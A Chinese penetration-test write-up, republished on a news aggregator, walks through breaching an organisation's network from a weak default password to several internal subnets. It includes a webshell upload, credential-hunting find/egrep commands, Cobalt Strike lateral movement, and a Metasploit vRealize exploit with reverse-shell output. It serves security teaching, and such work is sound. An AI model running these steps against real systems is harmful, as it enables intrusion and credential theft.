Redian新闻
>
记一奇葩弱口令到内网实战

记一奇葩弱口令到内网实战

科技

一、前期打点

拿到目标后首先要做的就是信息收集,这次给的目标就给个单位名称,通过互联网上搜索发现其网站在阿里云上着实无奈,在这里推荐个寻找资产的方法,利用ICP/IP地址/域名信息备案管理系统经查询,查询地址如下:



利用该平台进行查询时需要知道准确的单位名称,可利用该平台查询出已经备案的网站域名,对于只给了单位名称,进行信息收集还是很有效果的。

拿到域名后就会对域名就行子域名扫描了,子域名扫描工具还是很多的,就不在一一展开列举,推线一个在线子域名查找工具,多试试几个子域名扫描工具往往会有意外



扫到域名通过判断域名解析ip的归属地,可基本判断该域名所在服务器是目标单位自身资产,也就是有突破内网的希望,可值得一试。

通过查看该网站源码发现,其username长度为4,可初步判断,该网站用户名可能是4位数字



进一步测试发现,该系统还存在账号枚举,于是利用该漏洞,成功枚举出两个账号



有了账号然后就要进行暴力破解了,加载字典进行破解,发现了一个奇葩的密码

!@#$%%5e%26%2a()

当时看到密码瞬间无语,第一反应就是我的字典还有这密码,这算弱口令么。不管如何总算跑出来了,于是进行登录,发现总是提示密码错误,明明burp已经提示302,为啥浏览器还是提示密码错误呢,在细看密码,猜测可能是被浏览器自动编码了,通过抓包发现,果然编码了,burp抓包替换下就可以了,成功登录系统。那我是不是可以大胆猜测一下,这个账号密码应该是系统默认密码,估计用户可能也没登过。



登录后台就好说了,找找有没有注入、上传之类的通用漏洞,测试发现有个新建配置信息,发现存在一个上传,没有做任何限制,可轻松上传冰蝎,并且直接返回了路径,瞬间开心。




冰蝎连接,发现权限为iis权限,服务器出网,未发现杀毒软件,先翻翻服务器上的文件吧,发现还存在一个tomcat,于是又传了个tomcat马,执行命令发现为system权限,这下连提权都省了,还可以用如下命令找找一些配置文件中的账号密码,往往会有惊喜出现

#linuxfind / -regextype posix-extended -regex ".*\.(properties|xml|cnf|yaml|ini)" | xargs egrep -i "pass|pwd|jdbc#windowsfind /s /i "password" *.properties

此处搜索到配置文件中的一些数据库连接账号、密码以及其他的一个网段



靶机信息收集基本就结束了,接着就是上cs、搭建代理,做内网,利用cs读出服务器账号密码,利用代理远程连接



二、内网探测

在这次内网中用到了cs的smb进行横向,先简单介绍下smb beacon, SMB Beacon 使用命名管道通过一个父 Beacon 进行通信,这种对等通信对同一台主机上的Beacon 和跨网络的 Beacon 都有效。流量封装于SMB协议中,所以SMB beacon相对隐蔽,可在一定程度上绕过防护设备,smb beacon的具体配置此处不在赘述,具体操作可参考cd的用户手册。



当内网机器不出网时,可利用SMB Beacon 的主机必须接受445端口上的连接,利用现有主机执行portscan,扫描445端口



也可用 net view 命令来查找目标所在域的域内目标,在视图表中会显示所有的目标



可以利用psexec模块登录其他主机



还可进行Token窃取steal token,然后在利用psexec进行登录



利用该方法成功探测一个20的ip网段,接着进行内网探测,主要利用fscan进行内网扫描,发现内网存在多台相同密码服务器



通过登录一台服务器对服务器进行信息收集,在其浏览器上发现网神安全设备



同样密码登录网神入侵防御系统



进一步探测发现深信服安全产品



发现网内存在vcenter,配合CVE-2021-21975以及CVE-2021-21983,可成功获取该服务器权限,主要利用msf获取权限

msf6 > use exploit/linux/http/vmware_vrops_mgr_ssrf_rcemsf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhosts xx.xx.xx.xx.xxmsf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost xx.xx.xx.xxmsf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run[*] Started reverse TCP handler on xx..xx.xx.xx:4444[*] Starting SSRF server...[*] Using URL: https://0.0.0.0:8443/XtwOOPWn9SJ7[*] Local IP: https://xx.xx.xx.xx:8443/XtwOOPWn9SJ7[*] Executing automatic check (disable AutoCheck to override)[*] Leaking admin creds via SSRF...[*] xx.xx.xx.xx:8443/XtwOOPWn9SJ7#[*] xx.xx.xx.xx connected to SSRF server![*] Server stopped.iduid8(wheel)


简单介绍该漏洞原理如下:

Reality Smasher”利用 CVE-2021-21975 窃取 vRealize 的“maintenanceAdmin”帐户凭据。这是通过使用此存储库中包含的密钥和证书托管 HTTPS 侦听器来实现的。这些凭据用于所有后续已验证的请求。首先,管理员帐户的散列密码被请求并存储以备后用。

然后使用 CVE-2021-21983 覆盖“admin.properties”文件。接下来请求设置管理员用户的初始密码。这是允许的,因为管理员的凭据存储在“admin.properties”中。如果没有此文件,vRealize 会认为从未设置过凭据并接受未经身份验证的“/security/adminpassword/initial”请求。

重置vcenter密码(在获得用户允许的情况下进行的该操作),可成功登录系统,获取主机控制权限



查看内网服务器上的配置发现,zabbix配置文件存在xx.xx.60.xx,进而又发现新的网段,发现多个数据库




存在数据防泄露系统,可对监测主机进行文件操控



发现存在部分打印机,可查看打印文件,猜测该段可能是办公内网段



三、小结

简单总结下,本次的测试内网资产还是比较多的,总共有3个网段,信息收集不管是对于内网还是外网的打点都是很重要的,只有足够仔细才能有意外的收货,翻翻服务器上的主机文件也许就能意外发现其他网段,甚至是密码本之类的文件;还有就是对漏洞的一些验证积累,当然有0day就好,没有0day日常的1day复现也是不错的,平时技巧的积累也会起到关键作用。

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章400余篇,自研平台达到31个,目有18个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们


微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
Zabbix从v3.4到v5.0升级实战里尔克诗译:阿尔克斯提斯 - AlcestisInspector安全与自动生成报表实战成长素描 - - 高中数学竞赛美国信用分数有多重要?快速提升信用分数实战经验帖从CRT禁令到反LGBTQ,保守派会改变加州学校吗?远程房东的实战经验:如何远程选房客,修房子?实战经验丨EB1A/NIW面签时需注意的六大问题记一次中暑【运维实战家】无线三建七优之负载均衡记一次失败的实战攻防云安全中心API应急漏洞扫描实战记一次魅族发布会记一次在美国公路上开车没油的经历实战|蓝翔家族“宫斗”再激化:孔素英二次举报丈夫!家族内斗,殃及企业?从弱口令到内网生产区记一次实战攻防(打点-Edr-内网-横向-Vcenter)成长素描 - - 高中初露锋芒采竹笋去!前端性能优化实战从web端getshell到内网域控“我感受到内心的某些意识正在觉醒” | 读者笔记CPU利用率从10%提升至60%:中型企业云原生成本优化实战指南钱不值钱了!内网--端口转发以及端口复用面对重庆山火,这位美国友人为何比很多国内网友还紧张?灰林鸮之夜:记一次北京山区春季夜观阿里10年沉淀|那些技术实战中的架构设计方法重返办公室后,该重新思考什么才是好组织了 | 榕汇实战分享六年团队Leader实战秘诀|程序员最重要的八种软技能记一次疑点重重的疫情电信诈骗!希望你永远不会遇到……把战略从艺术变成科学,再走向艺术,华为这样做 | 榕汇实战分享下一代品牌如何成为世界品牌?安克创新的“枪炮与玫瑰” | 榕汇实战分享一诺&陈海贤今日直播:如何在动荡的关系中找到内心的安宁?[汽车] 三十岁的目标实现了三分之二,记一台Cayman987.2S
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。